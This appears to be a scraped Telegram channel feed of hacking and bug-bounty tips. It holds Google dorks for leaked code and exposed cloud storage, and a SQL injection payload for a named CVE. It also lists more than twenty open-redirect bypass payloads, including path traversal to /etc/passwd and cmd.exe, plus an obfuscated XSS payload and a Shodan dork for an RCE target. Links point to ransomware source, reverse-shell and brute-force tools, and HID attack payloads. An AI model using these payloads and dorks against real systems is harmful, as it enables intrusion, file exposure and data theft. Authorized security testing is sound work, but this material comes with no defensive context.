Termux All Command [Telegram Group]

Google Dorks - Code Leaks💧 site:pastebin. com "example. com" site:jsfiddle. net "example. com" site:codebeautify. org "example. com" site:codepen. io "example. com"

RCE (Remote Code Execution) Severity Level: Critical cvss_score": 9.8 Shodan Dork : app="SPIP" Poc Video Link : https://lnkd.in/dcTeAqpD

largest collection of malware source code, samples, and papers site : https://vx-underground.org/

Some Important Software is Coming for #CSE Students

SQLI Injection CVE: 2024-36837 Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 #BugBounty  #Tips

you can try this effective manual openredirect Bypass: 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/     15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd

DorkGPT - Generate Google Dorks with AI Experienced hunters can make their own advanced dorks but if someone is just starting new or need some help then you can use this ai! Link: https://www.dorkgpt.com/

XSS via base64 in url Payload used --> javascript​:parent[/al/.source+/ert/.source](document.domain)

Google Dork Hunt for XSS, SQLi, API vulnerabilities & hidden endpoints https://lnkd.in/dfv8F63u python dork[.]py -d "site:*target filetype:php"

🤖Mr. Robot - Hacking Tools 🔹Elpscrk - Mr.Robot Password Generator & Brute Force Program - https://github.com/RussianOtter/elpscrk 🔹fsociety-ransomware-MrRobot - https://github.com/graniet/fsociety-ransomware-MrRobot 🔹fsociety Hacking Tools Pack – A Penetration Testing Framework - https://github.com/Manisso/ fsociety 🔹An advanced memory forensics framework - https://github.com/volatilityfoundation/volatility 🔹rwwwshell: Getting a reverse shell with Mr. Robot ;) - https://github.com/DtxdF/rwwwshell 🔹Mr Robot CTF - https://github.com/noondi/Mr-Robot-CTF 🔹Block excessive crawlers, bots and spiders traffic on your web site space_invader - https://github.com/flydev-fr/Blackhole 🔹Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). - https://github.com/Screetsec/Brutal 🔹Honey Unix Encryptor (HUE) - https://github.com/entynetproject/honey 🔹Email-Mr.Robot - https://github.com/3x9l0itDZ/Email-Mr.Robot 🔹Mr. Robot's EvilCorp Terminal style for your shell - https://github.com/marcorosa/eterm

🧰Hackers Pocket Tools 🔹Flipper Zero 🔹Rubber Ducky 🔹Bash Bunny 🔹Wifi Nugget 🔹Deauther Watch 🔹Omg Cable

☄️SpideyX a multipurpose Web Penetration Testing tool with asynchronous concurrent performance with multiple mode and configurations. 📌 https://lnkd.in/dF7_atzQ

Google Dorks - Cloud Storage - Find exposed files ☁️ AWS S3 Buckets: site:s3.amazonaws[.]com "example[.]com" s3-external-1.amazonaws[.]com "example[.]com" s3.dualstack.us-east-1.amazonaws[.]com "example[.]com" Azure Blob Storage: site:blob.core[.]windows[.]net "example[.]com" site:dev[.]azure[.]com "example[.]com" Google Cloud: site:googleapis[.]com "example[.]com" site:drive[.]google[.]com "example[.]com" site:docs[.]google[.]com inurl:"/d/" "example[.]com" Microsoft Cloud: site:onedrive[.]live[.]com "example[.]com" site:sharepoint.]com "example[.]com" More Cloud Providers: site:digitaloceanspaces[.]com "example[.]com" site:dropbox[.]com/s "example[.]com" site:box[.]com/s "example[.]com" Google Dorks tool: https://lnkd.in/g-GHPrx8 Google Dorks full repo: https://lnkd.in/eRyZSGnV

Discover Ashok, an OSINT reconnaissance tool with features like Wayback Machine crawling, unlimited Google Dorking, GitHub info grabber, subdomain finder and CMS/tech detection! Link:- https://lnkd.in/gKzqMWNf

🚀 Introducing KidRecon Shell Script! 🚀 Supercharge your bug bounty reconnaissance and enumeration with KidRecon, the ultimate tool designed to automate reconnaissance and enumeration 📺 Watch the Demo Video: https://lnkd.in/edFWWsC5 🔗 Download KidRecon Here: https://lnkd.in/eRBJbGjx Level up your bug hunting game today! 🐞💻 🌟 Key Features 🚀 Automated Subdomain Enumeration 🔍 Live Subdomain Detection using HTTPx 🛠 Web Technology Identification with tailored filters for popular web platforms 🌐 URL Extraction 📂 Sensitive File Filtering for critical files like .php, .env, .json, and more 🎨 Colorful, User-Friendly CLI Output for easy readability and enhanced user experience 🔑 GET Parameter Filtering with gf for efficient vulnerability identification